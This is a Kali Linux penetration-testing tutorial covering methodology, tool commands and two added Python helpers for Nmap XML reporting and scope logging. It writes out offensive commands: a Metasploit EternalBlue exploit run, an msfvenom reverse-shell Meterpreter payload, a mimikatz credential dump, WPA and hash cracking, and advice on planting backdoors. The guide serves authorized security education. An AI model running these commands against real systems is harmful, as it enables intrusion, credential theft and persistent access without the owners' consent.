Perform Penetration Testing and Vulnerability Assessment

Here’s a structured guide to performing penetration testing and vulnerability assessment using Kali Linux, following the standard pentesting methodology:


1. Penetration Testing Methodology

Follow this step-by-step approach to ensure thorough testing:

A. Planning & Reconnaissance

  • Objective: Define scope, goals, and rules of engagement.
  • Tools:
    • Passive Reconnaissance (OSINT):
      • Maltego: Map relationships (domains, IPs, emails).
      • theHarvester: Gather emails, subdomains, and employee info.
        • theharvester -d target.com -l 500 -b all
      • Shodan: Search for exposed services online (web interface: shodan.io).
    • Active Reconnaissance:
      • Nmap: Scan for open ports and services.
        • nmap -sV -T4 -p- 192.168.1.100 # Full scan with service detection

B. Scanning & Enumeration

  • Network Scanning:
    • Nmap: Identify open ports, services, and OS.
      • nmap -A -T4 192.168.1.0/24 # Aggressive scan of a subnet
    • Masscan: Rapid port scanning (for large networks):
      • masscan --rate=1000 192.168.1.0/24 -p1-65535
  • Vulnerability Scanning:
    • Nessus: Comprehensive vulnerability scanner (requires license).
    • OpenVAS: Free alternative for vulnerability assessment.
      • sudo openvas-start # Start OpenVAS services
    • Nikto: Web server scanner.
      • nikto -h http://target.com
  • Web Application Scanning:
    • OWASP ZAP: GUI tool for finding web app vulnerabilities.
    • sqlmap: Detect SQL injection vulnerabilities.
      • sqlmap -u "http://target.com/login.php?username=admin" --dbs

C. Exploitation

  • Exploit Frameworks:
    • Metasploit: Use pre-built exploits from the database.
      • msfconsole
      • search exploit/windows/smb/ms17_010_eternalblue # Example exploit
      • use exploit/windows/smb/ms17_010_eternalblue
      • set RHOSTS 192.168.1.100
      • exploit
    • Exploit-DB: Manual exploit development (https://www.exploit-db.com/).
  • Common Exploits:
    • Unpatched Services: Exploit outdated software (e.g., Apache, SMB).
    • SQL Injection: Use sqlmap to gain database access.
    • Buffer Overflow: Use tools like Metasploit’s msfvenom to create payloads:
      • msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe

D. Post-Exploitation

  • Maintain Access:
    • Meterpreter: Use the meterpreter payload for persistent access.
      • meterpreter > sysinfo # Get system info
      • meterpreter > shell # Get a shell
    • Create a Backdoor: Add a user or modify system files.
  • Privilege Escalation:
    • LinEnum/WinPEAS: Enumerate system vulnerabilities.
      • ./LinEnum.sh -u # Linux privilege escalation checks
    • Mimikatz: Dump credentials (Windows targets).
      • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
  • Lateral Movement:
    • Use Meterpreter or SSH to move laterally across the network.

E. Reporting

  • Document Findings:
    • List vulnerabilities, their severity, and impact.
    • Include screenshots, Nmap XML reports, and exploit logs.
  • Tools for Reporting:
    • LaTeX/Markdown: Write technical reports.
    • Burp Suite: Export web app scan results.
    • Metasploit Reports: Use msfconsole’s reporting features.
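The Nmap XML reports listed above are the raw evidence that links the scanning phase (section B) to the written report. The following is an added example, not code from the original guide: it parses a constructed sample in the format that `nmap -oX` writes, keeps only open ports together with their service banner and any NSE script output, marks a port High when an NSE vuln script output contains the word VULNERABLE (the marker the Nmap vulns library prints when a check fires; treating that as High is an assumption of this example), and renders the result as the Markdown table the report would carry. The sample XML, the host name web01.lab.example and the function names are assumptions for illustration.

```python
"""Turn an Nmap XML report into a findings table for a pentest report.

Added example (not from the original guide): parses the XML written by
``nmap -oX scan.xml ...``, collects open ports with service banner and
NSE script output, and renders a Markdown table. The embedded XML is a
constructed sample, not a real scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample in the nmap -oX format (trimmed to the elements used below).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script=vuln 192.168.1.100">
  <host>
    <status state="up"/>
    <address addr="192.168.1.100" addrtype="ipv4"/>
    <hostnames><hostname name="web01.lab.example" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.6"/>
        <script id="http-csrf" output="Couldn't find any CSRF vulnerabilities."/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="filtered"/>
        <service name="mysql"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one finding dict per open port: host, addr, port, service, banner, scripts, severity."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        hn = host.find("hostnames/hostname")
        name = hn.get("name") if hn is not None else addr
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # filtered/closed ports are noise in a findings table
            svc = port.find("service")
            banner = " ".join(filter(None, [svc.get("product"), svc.get("version")])) if svc is not None else ""
            scripts = {s.get("id"): s.get("output", "") for s in port.findall("script")}
            # Assumption: an NSE vuln script that fires prints "VULNERABLE:" in its output.
            severity = "High" if any("VULNERABLE" in out for out in scripts.values()) else "Info"
            findings.append({
                "host": name,
                "addr": addr,
                "port": f'{port.get("portid")}/{port.get("protocol")}',
                "service": svc.get("name", "") if svc is not None else "",
                "banner": banner,
                "scripts": scripts,
                "severity": severity,
            })
    return findings


def to_markdown(findings):
    """Render findings as a Markdown table for the report body."""
    lines = ["| Host | Port | Service | Banner | Severity | NSE evidence |",
             "|---|---|---|---|---|---|"]
    for f in findings:
        evidence = "; ".join(f"{k}: {v}" for k, v in f["scripts"].items()) or "-"
        lines.append(f'| {f["host"]} ({f["addr"]}) | {f["port"]} | {f["service"]} | '
                     f'{f["banner"] or "-"} | {f["severity"]} | {evidence} |')
    return "\n".join(lines)


if __name__ == "__main__":
    print(to_markdown(parse_nmap_xml(SAMPLE_NMAP_XML)))
```

Feed a real scan by replacing SAMPLE_NMAP_XML with the contents of the `-oX` file; the table then drops straight into a Markdown report, and the NSE evidence column preserves the exact scanner output that justifies each severity rating.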

2. Vulnerability Assessment Tools

A. Network Vulnerability Scanners

  • Nessus: Commercial tool for comprehensive scans.
  • OpenVAS: Free alternative to Nessus.
  • Nmap Scripting Engine (NSE):
    • nmap -sV --script=vuln 192.168.1.100 # Run vulnerability scripts

B. Web Application Scanners

  • OWASP ZAP: GUI-based scanner for web apps.
  • sqlmap: SQL injection scanner.
  • DirBuster: Enumerate directories and files.
  • Wapiti: Automated web app vulnerability scanner.

C. Wireless Vulnerability Assessment

  • Aircrack-ng: Crack WPA/WPA2 passwords.
    • airodump-ng wlan0mon # Capture handshake
    • aircrack-ng -w wordlist.txt capfile.cap

D. Password Cracking

  • John the Ripper: Crack hashes.
    • john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
  • Hashcat: GPU-accelerated cracking.
    • hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

3. Best Practices

  • Authorization: Always obtain written permission before testing.
  • Ethical Compliance: Follow the Penetration Testing Execution Standard (PTES).
  • Documentation: Keep logs of every step (commands, findings, screenshots).
  • Avoid Noise: Use Nmap’s -T4 for faster scans but avoid overwhelming networks.
  • Use VMs: Test in a controlled environment (e.g., Metasploitable VM).
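The Authorization and Documentation points above can be enforced mechanically rather than left to discipline. The following is an added example, not code from the original guide: every planned step is checked against the scope from the rules of engagement before it is allowed to run, and each step is appended to a timestamped JSON-lines log that the report appendix can replay. The SCOPE values (192.168.1.0/24 and target.com, taken from the commands on this page), the log file name engagement.jsonl and the function names are assumptions for illustration.

```python
"""Scope enforcement and an engagement log for an authorized test.

Added example (not from the original guide): each step is checked against
the written rules of engagement before it runs and appended to a
timestamped JSON-lines log, so the report can reconstruct exactly what was
done and when. The SCOPE below is a constructed placeholder.
"""
import ipaddress
import json
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Constructed placeholder for the authorized scope from the rules of engagement.
SCOPE = {
    "networks": ["192.168.1.0/24"],
    "hostnames": ["target.com", "www.target.com"],
}


def in_scope(target, scope=SCOPE):
    """True if an IP, CIDR, hostname or URL falls inside the authorized scope."""
    host = urlsplit(target).hostname if "://" in target else target
    if host is None:
        return False
    try:
        net = ipaddress.ip_network(host, strict=False)
    except ValueError:  # not an address, so treat it as a hostname
        return host.lower() in {h.lower() for h in scope["hostnames"]}
    # Address families must match; an IPv6 target is never inside an IPv4 range.
    return any(
        net.version == auth.version and net.subnet_of(auth)
        for auth in (ipaddress.ip_network(n) for n in scope["networks"])
    )


def record(command, target, log_path=None, scope=SCOPE):
    """Build the log entry for one step and append it to log_path if given.

    Returns the entry. When 'authorized' is False the caller must not run
    the command; the refused attempt is still logged for the record.
    """
    entry = {
        "time": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "command": command,
        "target": target,
        "authorized": in_scope(target, scope),
    }
    if log_path:
        with open(log_path, "a", encoding="utf-8") as fh:
            fh.write(json.dumps(entry) + "\n")
    return entry


def timeline(log_path):
    """Read the log back as (time, command) pairs of executed steps for the report appendix."""
    with open(log_path, encoding="utf-8") as fh:
        return [(e["time"], e["command"]) for e in map(json.loads, fh) if e["authorized"]]


if __name__ == "__main__":
    steps = [
        ("nmap -sV -T4 -p- 192.168.1.100", "192.168.1.100"),
        ("nikto -h http://target.com", "http://target.com"),
        ("nmap -A -T4 10.0.0.0/24", "10.0.0.0/24"),  # outside the placeholder scope
    ]
    for cmd, tgt in steps:
        e = record(cmd, tgt, "engagement.jsonl")
        print("RUN " if e["authorized"] else "SKIP", cmd)
    print(timeline("engagement.jsonl"))
```

Wrapping every tool invocation in record() gives the report a complete, ordered command history, and the scope check stops the most common engagement mistake, a scan that drifts onto an address the authorization letter never covered.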

4. Example Workflow

  1. Reconnaissance:
    • Use theHarvester to gather subdomains of target.com.
    • Scan with Nmap to find open ports (e.g., 80, 443, 22).
  2. Exploitation:
    • Use sqlmap to find SQLi vulnerabilities on http://target.com/login.
    • Exploit a known SMB vulnerability with Metasploit.
  3. Post-Exploitation:
    • Use Meterpreter to escalate privileges and move laterally.
  4. Reporting:
    • Document the SQLi exploit, SMB vulnerability, and privilege escalation steps.

5. Quick Reference Table

Phase             | Tool         | Command/Usage
------------------|--------------|----------------------------------------------------------
Reconnaissance    | theHarvester | theharvester -d target.com -l 500 -b all
Scanning          | Nmap         | nmap -sV -T4 -p- 192.168.1.100
Exploitation      | Metasploit   | msfconsole; use exploit/windows/smb/ms17_010_eternalblue
Post-Exploitation | Meterpreter  | meterpreter > sysinfo
Web Scanning      | sqlmap       | sqlmap -u "http://target.com/login.php?user=admin" --dbs
Wireless Cracking | Aircrack-ng  | aircrack-ng -w wordlist.txt capfile.cap

6. Resources for Mastery

  • Certifications:
    • OSCP (Offensive Security Certified Professional): Practical pentesting.
    • CEH (Certified Ethical Hacker): Broad vulnerability assessment.
  • Practice Platforms:

Final Tips

By following this methodology and leveraging Kali Linux’s tools, you can systematically identify and exploit vulnerabilities while maintaining ethical standards. 🔍💻
